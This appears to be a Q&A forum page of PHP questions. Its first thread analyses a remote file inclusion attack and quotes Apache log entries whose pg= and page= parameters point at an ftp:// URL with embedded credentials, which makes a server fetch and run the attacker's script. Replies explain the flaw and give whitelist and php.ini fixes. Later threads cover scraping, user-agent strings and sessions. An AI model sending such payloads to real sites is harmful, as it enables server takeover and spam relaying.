User created folder on FTP from HTML - PHP

I'm facing a big problem and I can't find the cause. I have a website running on Apache on port 80, with FTP access.
Some user is creating folders on the FTP with malicious commands. I analysed the Apache log and found the following strange line:
[08/Jul/2016:22:54:09 -0300] "POST /index.php?pg=ftp://zkeliai:zkeliai@zkeliai.lt/Thumbr.php?x&action=upload&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/ HTTP/1.1" 200 18391 "http://mywebsite/index.php?pg=ftp://zkeliai:zkeliai@zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
In my FTP the following folder was created: /public_html/Cliente
I have a piece in my code that uses $_GET['pg'], see:
$pg = isset($_GET['pg']) ? $_GET['pg'] : null;
$pg = htmlspecialchars($pg, ENT_QUOTES);
I tried testing the request "pg=ftp://zkeliai..." just like the hacker did, but nothing happens, which is what I expected. I'm very confused about how the hacker created a folder on my FTP.

Without knowing what $pg is being used for, it's not really possible to tell exactly what the attacker is doing, but it looks like they sent a POST request to index.php with the parameters
?pg=ftp://zkeliai:zkeliai@zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/
The effect of your sanitation with htmlspecialchars is to convert the one & in the string to &amp;. When the request is then processed by index.php, though, it is converted back to a plain & internally, as PHP assumes it was just URL-encoded. So when index.php makes its server-side request to Thumbr.php, the & is present and serves to pass the extra parameters along to the FTP.
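Without seeing how $pg is used this is only a guess, but a plausible mechanism (an assumption, not confirmed by your code) is that index.php does something like `include $_GET['pg'];`. With `allow_url_include` enabled, `pg=ftp://user:pass@host/Thumbr.php` makes PHP download and execute the remote script with your site's permissions, which would explain the new folder. `htmlspecialchars()` only escapes HTML metacharacters, so it offers no protection against that. A minimal sketch of a whitelist fix:

```php
<?php
// Hypothetical fix, assuming index.php includes the file named by ?pg=.
// Map user input onto a fixed set of local files instead of trusting it.
function resolve_page($pg)
{
    $pages = [
        'home'    => 'pages/home.php',
        'contact' => 'pages/contact.php',
    ];
    // Anything not in the whitelist (including ftp:// URLs) falls back to home.
    return isset($pages[$pg]) ? $pages[$pg] : $pages['home'];
}

// Usage: include resolve_page(isset($_GET['pg']) ? $_GET['pg'] : 'home');
```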

We had a similar issue on our university's site. We have over 2200 hits in the last few days from this IP against two different .php pages: showcase.php and Thumbr.php.
Here's a snippet from our log
POST /navigator/index.php page=ftp://zkeliai:zkeliai@zkeliai.lt/zkeliai/showcase.php? 80 - 177.125.20.3 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+WOW64;+Trident/4.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C;+.NET4.0E) 200 0 0 11154
This page was used to send spam through our SMTP server. The page= GET parameter in the URL was being loaded by our PHP page with no filtering on the value. The showcase.php page (no longer on the FTP site) was a simple HTML form with a field for a subject, a field for HTML body contents, and a text area for email recipients.
Without being sure exactly what was posted, it seems that loading the FTP page (with the included credentials) into PHP via the $_GET[] value managed to execute the content of that page. I'm unclear as to how that works, but that seems to be what happened.
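If the mechanism really was PHP fetching the ftp:// URL and executing it (which is what it looks like, though I can't be sure), these php.ini settings shut off the remote-inclusion vector entirely:

```ini
; Disallow include/require of URLs (ftp://, http://, ...)
allow_url_include = Off
; Optionally disallow URL access for the fopen-family functions too;
; note this also breaks legitimate file_get_contents('http://...') calls.
allow_url_fopen = Off
```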

Related

Php script that works in fetching og:image from url but fails on specific ones

Hello, I'm trying to build a custom PHP script that fetches the og:image property into an array and then prints out the specific result. I've used the following code:
<?php
$_URL = $_GET['url']; // getting the url from the ?url= value

function getSiteOG( $url, $specificTags = 0 ){
    $doc = new DOMDocument();
    @$doc->loadHTML(file_get_contents($url)); // @ suppresses HTML parse warnings
    $res['title'] = $doc->getElementsByTagName('title')->item(0)->nodeValue;
    foreach ($doc->getElementsByTagName('meta') as $m){
        $tag = $m->getAttribute('name') ?: $m->getAttribute('property');
        if (in_array($tag, ['description','keywords']) || strpos($tag, 'og:') === 0)
            $res[str_replace('og:', '', $tag)] = $m->getAttribute('content');
    }
    return $specificTags ? array_intersect_key($res, array_flip($specificTags)) : $res;
}

$_ARRAY = getSiteOG($_URL);
echo $_ARRAY['image'];
?>
and when used with the following syntax, e.g. on our site,
tags.php?url=http://www.stackoverflow.com
it prints out the following result
https://cdn.sstatic.net/Sites/stackoverflow/img/apple-touch-icon@2.png?v=73d79a89bded
Which is acceptable.
The script is run from a batch file using the following method:
@echo off
PowerShell -Command "(new-object net.webclient).DownloadString('http://yoursite.com/tags.php?url=https://www.banggood.com/TKEXUN-M2-Flip-Phone-2800mAh-3_0-inch-Touch-Screen-Blutooth-FM-Dual-Sim-Card-Flip-Feature-Phone-p-1367504.html')"
PowerShell -Command "(new-object net.webclient).DownloadString('http://yoursite.com/tags.php?url=https://www.banggood.com/Xiaomi-Mi-9T-Pro-Global-Version-6_39-inch-48MP-Triple-Camera-NFC-4000mAh-6GB-64GB-Snapdragon-855-Octa-core-4G-Smartphone-p-1547570.html?ID=564486&cur_warehouse=HK')"
PowerShell -Command "(new-object net.webclient).DownloadString('http://yoursite.com/tags.php?url=https://www.banggood.com/OnePlus-7-6_41-Inch-FHD-AMOLED-Waterdrop-Display-60Hz-NFC-3700mAh-48MP-Rear-Camera-8GB-256GB-UFS-3_0-Snapdragon-855-Octa-Core-4G-Smartphone-p-1499559.html?ID=62208216150349&cur_warehouse=HK')"
That in turn prints the resulting links to the screen, or to a file when piped.
It also works with a list of URLs read from a file in another batch script, but that doesn't matter now.
The problem I'm experiencing is this: when I try to fetch the og:image links from the Gearbest website, for example this one
https://www.gearbest.com/headsets/pp_009839056462.html
I get no results!
I've run simple commands like wget -qO- url, and curl -I url for the headers, and the result suggests it has something to do with how my PHP (or even curl) was compiled, on the SSL side.
I've read here that some sites require newer, more secure SSL/TLS versions.
To be noted: I've also tried masquerading the wget request by changing the user agent and other cookie-related values on the fly, but still with no success.
I'm on shared hosting with access to a jailed shell, but with many binary tools (sed/awk/wget/curl etc.), and the host is quite helpful about adding binaries I may need, but I still don't know how to proceed.
Any help is greatly appreciated
You're probably blocked due to your user-agent. I tried a curl to gearbest as well, and got a 403 permission denied error. Akamai seems to be blocking this user-agent.
But when I used something like curl -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" URL it worked fine.
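The same fix from PHP, for anyone hitting this in a script rather than on the CLI. This is a sketch using cURL, with the URL and User-Agent string as placeholders:

```php
<?php
// Fetch a page while presenting a browser User-Agent; some CDNs
// (Akamai, apparently, in this case) reject the default curl/wget agents.
function fetch_with_ua($url, $ua)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the body as a string
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // follow redirects
    curl_setopt($ch, CURLOPT_USERAGENT, $ua);       // the header being checked
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

$ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 '
    . '(KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36';
// $html = fetch_with_ua('https://www.gearbest.com/headsets/pp_009839056462.html', $ua);
```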

How to get the total data consumed to render a web page in php

The browser console displays the size in bytes of all downloaded CSS, JS and images in an HTTP request. How can I get this data in PHP?
Any help would be appreciated.
If you are making external requests over HTTP (like what Inspect Element is showing), you can parse the HTTP header, or send a HEAD request instead of GET/POST to read the Content-Length header. A HEAD request will not return the content of the file, only the header information, which can save a lot of resources if you don't care about the content of the page you are requesting. If you do want the content, just send a GET/POST request and parse the response header, which is always returned.
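A sketch of the header-parsing half of this, assuming you already have the raw response headers as a string (e.g. from a cURL HEAD request made with CURLOPT_NOBODY):

```php
<?php
// Extract Content-Length from a raw HTTP header block. Returns FALSE when
// the header is absent (e.g. chunked transfer encoding, where the server
// never states a total size up front).
function content_length_from_headers($rawHeaders)
{
    if (preg_match('/^Content-Length:\s*(\d+)/mi', $rawHeaders, $m)) {
        return (int) $m[1];
    }
    return false;
}
```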
If you are wondering how large a file is on your own server (the one PHP is running on), you can use filesize(), which returns the file size in bytes, or FALSE on failure (for example, if the file doesn't exist).
int filesize ( string $filename )
You can evaluate the HTTP server's access log file, where (usually) the transferred size is recorded. This requires read permission on the log, and it can obviously only be done after a request has finished. Note that this way you will be blind to data cached on the client side or by a proxy server between client and server.
This is an example entry:
::1 - - [19/Feb/2014:09:45:38 +0100] "GET /test.html HTTP/1.1" 200 129 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36 SUSE/32.0.1700.102"
You can see the size, "129" bytes, next to the HTTP 200 (OK) return code. There are packages for this (awstats and the like), but in your case it might be easier to just "grep through" the file. It might be non-trivial, though, to decide which requests belong together to form one "page load".
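A sketch of the "grep through" approach in PHP, matching the status/size fields of a common-log-format line like the example above:

```php
<?php
// Pull the response size (bytes) out of a common/combined log format line:
// the two numbers right after the quoted request are status code and size.
function log_line_bytes($line)
{
    if (preg_match('/"\s+(\d{3})\s+(\d+|-)/', $line, $m)) {
        return $m[2] === '-' ? 0 : (int) $m[2]; // "-" means no body was sent
    }
    return null; // unrecognized line format
}
```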
Your specific requirements are a little vague (files on your own server, or someone else's webpages?), but you can get a file's size from PHP using this function:
int filesize ( string $filename );

Strange behavior on Linux (php/mysql)

We're having strange behavior on our linux server. Here are some symptoms:
1) PHP using old information when processing scripts:
For example: I loaded the site today and it served the mobile version of our Joomla 2.5.9 template instead of the normal template. I looked through the access log, and two minutes before my visit an iPhone had accessed the site. So, for some reason the PHP code ‘thought’ my access was still the iPhone’s. Here’s a snippet from the access log:
74.45.141.88 - - [01/Mar/2013:07:39:24 -0800] "GET / HTTP/1.1" 200 9771 "https://m.facebook.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B141 [FBAN/FBIOS;FBAV/5.5;FBBV/123337;FBDV/iPhone2,1;FBMD/iPhone;FBSN/iPhone OS;FBSV/6.1;FBSS/1; FBCR/AT&T;FBID/phone;FBLC/en_US;FBOP/0]"
...
63.224.42.234 - - [01/Mar/2013:07:43:45 -0800] "GET / HTTP/1.1" 200 9771 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
2) Links on the site are sometimes being generated within Joomla differently: sometimes "ww.sitename.com" or just "sitename.com" when it should be "www.sitename.com".
3) When I make a configuration change to the site (within Joomla administration), it doesn't always take effect immediately, though it should. For instance, when I unpublish something through the user interface, it will still show as published for quite a while afterwards. During one such problem I tried restarting both Apache and MySQL, and it didn't help; I had to wait until something updated. Eventually it does update.
4) The php session doesn't consistently work. We have code that generates a captcha from a session variable. The code fails sometimes rendering the captcha inoperable.
All of the above is totally inconsistent; sometimes it wigs out, other times it doesn't. Also, note that the site works totally fine on our dev.sitename.com. We even tried switching the Apache webserver configuration from dev.sitename.com to sitename.com, and the problem still persists.
Thank you.
I had a similar problem with the Magento CMS; in my case the cause was the cache used by Magento. Disabling the caching functionality solved the problem.

How to spoof useragent for a php script run through cron

I am running a PHP script through cron every 30 minutes which parses and saves some pages of my site on the same server. I need to run the script with a Firefox or Chrome user agent, since the parsed pages have some interface dependency on CSS3 styles.
I tried this within my script:
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13");
But the Firefox- or Chrome-dependent stylesheets don't load with it. I tried with both double and single quotes.
My question is: is it possible to spoof the user agent for scripts run through the server rather than a browser, and if so, how?
NOTE: I know that my browser dependency for interface is bad. But I want to know if this is even possible.
EDIT
My script runs through the sitemap on the server and creates an HTML cache of the pages in the sitemap. It doesn't need to execute any JS or CSS files. The only thing needed is to spoof the user agent so that the generated cache contains the extra JS and CSS files for that browser that are included in the header.
You can consider that I am generating cache files for all browser types - IE, WebKit and Firefox - so that I can serve the right cache file to each user based on their browser. At the moment I am serving the same files to all users, that is, without the extra CSS files.
I think I will need to hardcode the CSS file into my page so that it is always included in the cache (non-compatible browsers won't show any change; it will only add file overhead for them). Thanks anyway.
When you run a PHP script through cron, the idea is that it is a script, not a webpage being requested. Even if you could spoof the user agent, the CSS and JavaScript isn't going to be executed as it would be inside a real web browser. The point of cron is to run raw scripts that do, for example, file operations.
Well, first I would look at your user agent identification. I think it is unnecessarily complicated; try simply Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1).
If this doesn't work, you could try executing the curl call as a shell command with exec(). In that case you could run into the problem that the page is not really rendered. You could work around this by using an X virtual framebuffer, which makes the page render in memory without showing any screen output - ergo, behave like a browser.
You could do it like this:
exec("xvfb-run curl [...]");
You can also set the user agent by using ini_set('user_agent', 'your-user-agent');
Maybe that will help you.
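To make the ini_set() route concrete: the user_agent setting is what PHP's stream wrappers (file_get_contents() over http:// and friends) send, so no cURL is needed at all. A sketch, with the URL as a placeholder:

```php
<?php
// The user_agent ini value is sent by PHP's http:// stream wrapper, so a
// cron script that uses file_get_contents() picks it up automatically.
ini_set('user_agent',
    'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) '
  . 'Gecko/20080311 Firefox/2.0.0.13');

// $html = file_get_contents('http://example.com/page-to-cache.html');
```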

Session won't start and server variables are incorrect

I am trying to start session this way:
session.auto_start = 1
I set it this way, but the session doesn't start. I changed the startup in my PHP as follows:
ini_set("session.use_only_cookies",true);
session_save_path(dirname(__file__)."/../User");
Basically, I don't see any file created in that folder.
Also when I do this:
$id=session_id();
I get $id=0;
Why do all these errors happen?
I am trying to start session this way:
session.auto_start()
Where and how do you do that? Not in code I hope? It's a php.ini setting, and if you want to enable it, you have to do it there.
I changed the startup in my PHP as follows:
ini_set("session.use_only_cookies",true);
session_save_path(dirname(__file__)."/../User");
Basically, I don't see any file created in that folder.
Does the user as which PHP runs have permissions on that folder? Haven't you got your PHP files sorted in deeper folders, where "(directory)../User" doesn't exist? Have you tried echoing the path to see where it points? Have you tried manually writing a file there? What about using realpath()?
Also when I do this:
$id=session_id();
I get $id=0;
That's a symptom. Your session doesn't start, so you can't get a session ID.
$os=$_SERVER['SERVER_SOFTWARE'];
I am trying to get the operating system and I get nothing.
What do you get? Tried var_dump($os)?
and when I try to do this: $browser= $_SERVER['HTTP_USER_AGENT']; I get weird browser.
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
That "Weird Browser" is Chrome 15. What's weird about that?
And please enable error reporting since I'm sure there'll be a few hints there.
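Putting the pieces above together, a sketch of the order that usually matters here: configure the session first, then call session_start(), then check session_id(). The save path is the asker's and must exist and be writable by the PHP user:

```php
<?php
error_reporting(E_ALL);                   // surface the hints mentioned above
ini_set('display_errors', '1');

ini_set('session.use_only_cookies', '1'); // configure BEFORE starting
$path = __DIR__ . '/../User';
if (is_dir($path) && is_writable($path)) {
    session_save_path($path);             // only set it if it can actually be used
}

session_start();                          // nothing happens without this call

// After a successful start, session_id() is a non-empty string;
// it is never the integer 0 ('' means "no session started").
```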
